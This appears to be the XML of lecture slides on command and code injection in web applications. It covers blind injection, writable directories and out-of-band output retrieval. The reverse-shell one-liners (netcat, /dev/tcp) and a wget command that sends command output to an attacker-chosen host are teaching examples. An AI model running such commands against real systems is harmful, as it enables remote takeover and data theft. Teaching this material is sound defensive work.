            <a:off x="554096" y="1403613"/>
            <a:ext cx="2424793" cy="30207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4C882-C034-4421-A9FF-A414B3507D85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1004207" y="2057400"/>
            <a:ext cx="2424793" cy="30207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56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CBF7-CA51-4A51-A04E-85DC0777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Blind Command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C44E91-B04A-444F-BB50-86CD506E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27DE7-74BE-4902-9B7B-EACD96F26E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A command injection with no output is called "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>blind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>There some tricks to exfiltrate the output of the command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Write the output on a file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on a directory that is reachable from the network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Use an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>out-of-bound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>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718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B482-DE9E-4158-8CAB-0B9AF79F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Blind Command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3E66A-A96A-483A-A637-84DB71DF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AEB4F-6B9B-4B45-889A-7B51D06B68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In bash it is possible to use the character "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“ to redirect the output to a file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This character will redirect all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1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to a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>For example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRP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E5BDF92A-71E5-432C-A703-DBDF9CF9C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842" y="3237668"/>
            <a:ext cx="3547649" cy="139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62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C743-20F5-4C0E-8B22-C1CCB373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Command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40B82E-33EF-4C29-9111-D645412A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FEF7C-F4FC-4F40-B3BC-AB333DED5FA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The are some directories that are commonly left writable and public reachable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Directories that contains static files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/static/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/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Directories where users upload files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>These are often writable, because the web app itself is intended to write on these directories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8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5C07804-0969-0542-AEDF-8E891213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Goal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FACB6-71E4-4049-945C-0A658AC3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A54CEF-CF3D-EE44-BE2A-C70040B107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Introduce the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>definition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> of injection in web security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>Present common </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> injections techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>Present</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>various</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> coding injections techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t>Show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>possible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>mitigations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>previous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/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104409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C6BD-2CE1-423A-94A3-626287D3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Command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9C69F-E31E-490E-BE38-F1A5925F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5DA75-C3FD-432C-A68D-3673A26BF3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92500"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An out-of-bound connection generally works well, and it is easier to use than finding a writable directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>To use it, there are three main methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>A reverse shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Issue the output of a command to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>TCP/HTTP request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If there is a strong firewall protection, use a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DNS bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Of course, these methods require a public reachable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97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6AE4-0478-4D6E-BC98-04CB12689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EAFA86-FCF3-4717-A553-3E228B69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048B4-EBB7-4CE0-984A-9BB7C1B08A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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>To open a reverse shell, expose a TCP server on a public reachable server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> works pretty well for this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> 1337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>This command will listen to incoming connections on port 1337, and the port can be changed according to needs</a:t>
            </a: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464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E693-8262-493B-9A55-8C76B4EE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1D57B6-DE6E-4896-AF45-89BE408F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2E58E-1BE2-4C7B-B8BC-DA5E802DC4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Then within the injection, run</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> -e /bin/bash host port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Depending on the version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>-e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>parameter might not be implemented. There are other ways to issue the same command, like</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/port 0&gt;&amp;1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062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E693-8262-493B-9A55-8C76B4EE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1D57B6-DE6E-4896-AF45-89BE408F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2E58E-1BE2-4C7B-B8BC-DA5E802DC4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Then within the injection, run</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> -e /bin/bash host port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Depending on the version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>-e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>parameter might not be implemented. There are other ways to issue the same command, like</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>/port 0&gt;&amp;1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A picture containing black, holding, white&#10;&#10;Description generated with very high confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB1C6391-0356-4CA1-84BC-944F8800D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984" y="2291622"/>
            <a:ext cx="5018616" cy="140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22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E4BB-CF0A-459A-AE45-5997C0DD7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34A4C2-258C-4D4C-B4CF-45D812E7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253A-AD64-40D1-B9FB-E71C7E2A8A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>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Command substitution can be used with HTTP to exfiltrate the output</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> http://yourhost/$(whoami)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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EDC432A-C661-410F-8AE7-41A09091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067" y="3434556"/>
            <a:ext cx="6098116" cy="5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31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A50C-E2E6-40E3-A9CD-F0C0651C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EAF2D-5747-4340-8328-545A9CBC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E3459-999F-4CC8-8127-0F96F2891B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It is possible to send files with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>; this command is very handy to exfiltrate single files</a:t>
            </a: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9591E418-8315-40DD-97CB-217E4750C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656340"/>
            <a:ext cx="8347166" cy="157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0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5A50C-E2E6-40E3-A9CD-F0C0651C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Command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EAF2D-5747-4340-8328-545A9CBC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E3459-999F-4CC8-8127-0F96F2891B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It is possible to send files with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>; this command is very handy to exfiltrate single files</a:t>
            </a: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9591E418-8315-40DD-97CB-217E4750C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656340"/>
            <a:ext cx="8347166" cy="1574617"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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A180DB7-C6AA-4402-81C1-0FFAF7971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149" y="56440"/>
            <a:ext cx="4467617" cy="478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00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6990-7D31-41CE-8ED0-05BE3479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Outline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70550-720E-4296-A137-81FBC8D6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326CC-0F93-4FD8-83AE-10C4FBE77C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85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Command Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Output Retrieving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Code Injections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PHP Code Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Tips and Tricks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Fixes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627568-05BA-41D4-92B1-5BE86AFACDE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612322" y="3420835"/>
            <a:ext cx="4653642" cy="10287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914B61-96C8-4248-BDE0-53560955BFBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554097" y="1343456"/>
            <a:ext cx="3233057" cy="77560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4C882-C034-4421-A9FF-A414B3507D85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1004207" y="2057400"/>
            <a:ext cx="2424793" cy="67763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46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7DA6-A5FF-4126-8E36-11015027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Code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55BDFF-619B-4C2F-99FD-FC1D238F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2AC0D-A2A3-436B-B5AF-41D383549F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>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Code injection works in the same way as a command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The only difference is that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the injected code will be executed by the application interpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> instead of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>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00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9435-95D2-42DE-B870-4B7CEC33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Code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4D33B3-EC05-4A82-9611-F742B9C9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37930-28A2-4E71-8B24-776AF7BE6A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>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Common entry points in scripting languages are all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>functions/language constructs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> that permit to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>evaluate code dynamically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>This functions are standard in all scripting languages and are often called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>evaluate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>assert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13036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5C07804-0969-0542-AEDF-8E891213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Prerequisites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FACB6-71E4-4049-945C-0A658AC3B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A54CEF-CF3D-EE44-BE2A-C70040B107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Lecture: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WS_1.2 - File Disclosure and Server-Side Request Forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i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99802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5FDC-3075-4DC7-AB9D-106E293E9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Code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277ED6-3F7E-457D-B932-5321A745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65187-76F1-437F-82AE-3026B97745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Code injections are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>language dependent</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Finding them requires knowing in which language the application is written</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>If this information is not available, try insert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>special characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> which are common in most languages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66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2918-5088-4648-83F0-FDF5CE1CF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Code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7AB9C4-FE11-48F8-9F2E-E4BB2D96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A7080-16EA-4331-95B0-AF4CC7CE7A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Some special characters are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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>single and double quotes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b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
